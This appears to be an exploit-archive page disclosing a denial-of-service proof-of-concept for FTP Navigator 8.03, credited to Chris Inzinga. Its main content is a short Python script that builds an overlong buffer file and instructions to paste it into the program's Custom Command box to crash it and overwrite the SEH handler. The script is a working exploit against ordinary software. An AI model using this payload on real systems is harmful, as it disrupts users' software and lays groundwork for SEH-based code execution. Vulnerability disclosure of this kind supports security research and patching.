FTP Navigator 8.03 Denial Of Service

2019.12.20

Credit: Chris Inzinga

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: 8.03
# Tested on: Windows 7 SP1 (x86)
# Steps to reproduce:
# 1. Generate a malicious payload via the POC
# 2. In the application click "FTP - Server" > "Custom Command"
# 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
# 4. Observe a program DOS crash, overwriting SEH
#!/usr/bin/python
payload = "A" * 4108 + "B" * 4 + "C" * 40
try:
fileCreate =open("exploit.txt","w")
print("[x] Creating file")
fileCreate.write(payload)
fileCreate.close()
print("[x] File created")
except:
print("[!] File failed to be created")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

FTP Navigator 8.03 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.